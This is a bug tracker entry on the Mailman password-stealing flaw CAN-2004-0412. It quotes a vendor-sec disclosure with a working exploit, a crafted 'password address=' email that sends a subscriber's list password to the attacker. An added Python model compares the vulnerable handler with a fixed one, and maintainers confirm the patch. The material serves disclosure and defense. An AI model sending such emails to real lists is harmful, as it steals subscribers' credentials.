Bugzilla – Bug 55868
mailman password stealing
Last modified: 2021-10-02 09:01:12 UTC
From: Mark J Cox <mjc@redhat.com>
To: vendor-sec@lst.de
Cc: barry@python.org, jdennis@redhat.com
Subject: [vendor-sec] CAN-2004-0412 Mailman password stealing

----------------------------------------

We noticed a security flaw mentioned in Mailman as part of the 2.1.5 release. See:
http://mail.python.org/pipermail/mailman-announce/2004-May/000072.html

I tracked down the issue this morning and worked out an easy exploit:

Send the following email (From: address doesn't matter)
--
To: fedora-devel-list-request@redhat.com

password address=markcox@gmail.com
password address=mjc@redhat.com
--

This will cause mailman to send the fedora-devel-list mailman password belonging to markcox@gmail.com (victim) to mjc@redhat.com (attacker). mjc@redhat.com doesn't have to be a subscriber to the list. Therefore you can effectively steal the passwords for any subscribers if you know who is subscribed.

You can add in more "password address=victim" lines before the final line to retrieve multiple passwords (leaving the last line intact pointing to you, to make sure that final email gets sent to you).

Patch for just this issue extracted from the big 2.1.4-2.1.5 diff is attached. Barry has confirmed this is correct.

This issue doesn't seem to affect 2.0.13 (the function, ProcessPasswordCmd in MailCommandHandler.py, doesn't let you switch users).

Anyway, this is public, but no one seems to have noticed so I allocated CAN-2004-0412 to it anyway. If Debian or FreeBSD noticed and allocated a name please reply on list asap.
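The report above describes the mechanism but not the code. The following is an added, simplified model written for this page (it is not Mailman's own code, and the member addresses and passwords are constructed sample data): one results message collects the output of every "password address=..." line, and the vulnerable handler lets each such line also choose where that results message is delivered, so the last line decides who receives all of the passwords. The hardened variant beside it mails each reminder only to the member it belongs to.

```python
"""Model of the CAN-2004-0412 password-command flaw (added illustration).

Not Mailman's code: a minimal re-implementation of the behaviour the
report describes, with a hardened counterpart for comparison.
"""
from dataclasses import dataclass, field

# Constructed sample subscriber database (hypothetical addresses/passwords).
MEMBERS = {
    "victim@example.org": "hunter2",
    "attacker@example.net": "secret",
}


@dataclass
class Results:
    sender: str
    returnaddr: str                     # where the results message is mailed
    lines: list = field(default_factory=list)


def _parse_password_cmd(line):
    """Return the target of a 'password address=<addr>' line, else None."""
    parts = line.split()
    if (len(parts) == 2 and parts[0].lower() == "password"
            and parts[1].startswith("address=")):
        return parts[1][len("address="):]
    return None


def vulnerable_process(sender, body):
    """Modelled 2.1.4-style handler. Returns a list of (recipient, text)."""
    res = Results(sender=sender, returnaddr=sender)
    for line in body.splitlines():
        addr = _parse_password_cmd(line)
        if addr is None:
            continue
        if addr not in MEMBERS:
            res.lines.append(f"{addr} is not a member")
            continue
        res.lines.append(f"Your password for {addr} is: {MEMBERS[addr]}")
        # The flaw: the command redirects the whole results message, so the
        # last 'address=' line picks the recipient of every line above it.
        res.returnaddr = addr
    return [(res.returnaddr, "\n".join(res.lines))]


def fixed_process(sender, body):
    """Hardened model: a member's password is mailed only to that member."""
    res = Results(sender=sender, returnaddr=sender)
    outgoing = []
    for line in body.splitlines():
        addr = _parse_password_cmd(line)
        if addr is None:
            continue
        if addr not in MEMBERS:
            res.lines.append(f"{addr} is not a member")
            continue
        # Separate message to the member's own address; the sender only
        # learns that a reminder went out, never the password itself.
        outgoing.append((addr, f"Your password for {addr} is: {MEMBERS[addr]}"))
        res.lines.append(f"A password reminder has been sent to {addr}")
    outgoing.append((res.returnaddr, "\n".join(res.lines)))
    return outgoing


def leaked_to(deliveries, recipient, password):
    """True if `password` appears in any message delivered to `recipient`."""
    return any(r == recipient and password in text for r, text in deliveries)


# The message body from the report, with the constructed addresses.
EXPLOIT_BODY = (
    "password address=victim@example.org\n"
    "password address=attacker@example.net\n"
)

if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_process), ("fixed", fixed_process)):
        deliveries = handler("anyone@example.com", EXPLOIT_BODY)
        print(name, "-> attacker gets victim's password:",
              leaked_to(deliveries, "attacker@example.net", "hunter2"))
```

The check worth keeping from this model is the last one: a command that can both read another account's secret and steer the reply is the combination to look for, and the fix is to bind the delivery address to the account whose secret is being sent rather than to anything under the sender's control.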
Created attachment 19921: the patch
I can confirm the efficacy of both the exploit and the suggested fix. Doing checkin right now. Affected distros are 8.2, 9.0 and 9.1. Security team, please provide a patchinfo ;)
Created attachment 20122: patchinfo for box
Patchinfo submitted, please tell suse-dist.
Done.
Approved package. It was SL only, so no QA.
*** Bug 56294 has been marked as a duplicate of this bug. ***